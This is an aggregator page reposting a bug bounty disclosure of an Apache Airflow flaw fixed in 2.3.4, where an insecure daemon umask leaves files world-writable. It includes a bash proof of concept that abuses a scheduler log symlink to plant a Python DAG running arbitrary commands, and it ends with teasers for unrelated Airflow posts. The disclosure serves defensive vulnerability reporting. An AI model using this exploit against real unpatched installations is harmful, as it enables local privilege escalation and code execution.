➠ Internet Bug Bounty: Airflow Daemon Mode Insecure Umask Privilege Escalation
Apache Airflow prior to 2.3.4 had multiple components with an insecure daemon umask of 0, resulting in critical files and directories to be world writable. As such, any local user can infer Airflow to process specially crafted input and ultimately perform a privilege escalation to user executing Airflow. In particular the scheduler component is exploitable. This is CWE-277: Insecure Inherited Permissions The vulnerability and fix was announced as https://www.openwall.com/lists/oss-security/2022/09/02/3 Proof of concept The following attack works against the demo installation of Apache Airflow (when airflow scheduler is run with the --daemon flag): ``` !/bin/bash TARGET=/home/airflow umask 0 cd $TARGET/logs/scheduler/latest/native_dags/example_dags rm example_bash_operator.py.log ln -s $TARGET/dags/poc.py example_bash_operator.py.log until [ -f $TARGET/dags/poc.py ] do sleep 1 done rm example_bash_operator.py.log (cat <<'EOF' import os os.system("id >>/tmp/pwned") from airflow import DAG EOF ) > $TARGET/dags/poc.py ``` The injected DAG payload (code execution) is triggered when the Airflow scheduler is restarted. This simple PoC performs a full arbitrary code execution, but other means of gaining control via custom DAGs exist as well. Impact Privilege escalation: loss of confidentiality, integrity and......
Zur Startseite
➤ Ähnliche Beiträge für 'Internet Bug Bounty: Airflow Daemon Mode Insecure Umask Privilege Escalation'
Airflow Development with Docker
vom 1040.33 Punkte
Airflow tooling and code structure
The airflow should be easy to work with and develop.
The new astro-cli tool from astronomers is intended to help users work with their cloud and it doesn't cover all the development workflows.
It does not play well with d
Working with Managed Workflows for Apache Airflow (MWAA) and Amazon Redshift
vom 971.36 Punkte
I was recently looking at some Stack Overflow questions from the AWS Collective and saw a number of folk having questions about the integration between Amazon Redshift and Managed Workflows for Apache Airflow (MWAA). I thought I would put together a quick po
Using VSCode with Apache Airflow
vom 765.8 Punkte
In this short post, I wanted to highlight how you can use a VSCode plugin to work with a local running instance of Apache Airflow to improve the developer experience. This post was inspired by a tweet from Kaxil Naik who was asking about what features developers are looking fo
Self managed Apache Airflow with Data on EKS
vom 563.51 Punkte
data on eks
I have written in the past about how you can get started with Apache Airflow using the AWS managed service, Managed Workflows for Apache Airflow. But what if you want to self managed Apache Airflow? When I speak with developers,
Building a Data Lakehouse for Analyzing Elon Musk Tweets using MinIO, Apache Airflow, Apache Drill and Apache Superset
vom 534.62 Punkte
Every act of conscious learning requires the willingness to suffer an injury to one's self-esteem. That is why young children, before they are aware of their own self-importance, learn so easily.Thomas Szasz
Motivation
A Data Lakehouse is a modern data architectur
Twitter Data Pipeline with Apache Airflow + MinIO (S3 compatible Object Storage)
vom 520.17 Punkte
Twitter Data Pipeline with Apache Airflow + MinIO (S3 compatible Object Storage)
The more that you read, the more things you will know. The more that you learn, the more places you’ll go.Dr. Seuss
Motivation
During my journey
Running the KubernetesPodOperator in different AWS accounts when using Amazon Managed Workflows for Apache Airflow v2.x
vom 462.37 Punkte
Running KubernetesPodOperator in different AWS accounts
I got a mail from Apurav Sharma who was looking to find out about how MWAA supported using the KubernetesPodOperator to kick off tasks in Amazon EKS Containers in any AWS account. This post r
Data Pipeline with Airflow and AWS Tools (S3, Lambda & Glue)
vom 454.89 Punkte
Learning a little about these tools and how to integrate themPhoto by Nolan Krattinger on UnsplashIntroductionA few weeks ago, while doing my mental stretch to think about new post ideas, I thought: Well, I need to learn (and talk) more about cloud and these thin
Exploiting a Flaw in Bitmap Handling in Windows User-Mode Printer Drivers
vom 433.97 Punkte
In this guest blog from researcher Marcin Wiązowski, he details CVE-2023-21822 – a Use-After-Free (UAF) in win32kfull that could lead to a privilege escalation. The bug was reported through the ZDI program and later patched by Microsoft. Marcin has graciously provided this detailed write-up of the vulnerability, examines how it could be e
Deploying Apache Airflow in Azure to build and run data pipelines
vom 398.5 Punkte
Apache Airflow is an open source platform used to author, schedule, and monitor workflows. Airflow overcomes some of the limitations of the cron utility by providing an extensible framework that includes operators, programmable interface to author jobs
Exploring Shell Launch Scripts on Managed Workflows for Apache Airflow (MWAA) and mwaa-local-runner
vom 336.89 Punkte
Managed Workflows for Apache Airflow (MWAA) recently launched a new feature that a lot of folk had been asking for, which was the ability to add additional libraries, binaries, or environment variables when launching Airflow workers. If you missed th
The August 2022 Security Update Review
vom 318.11 Punkte
It’s the second Tuesday of the month, and the last second Tuesday before Black Hat and DEFCON, which means Microsoft and Adobe have released their latest security fixes. Take a break from packing (if you’re headed to hacker summer camp) or your nor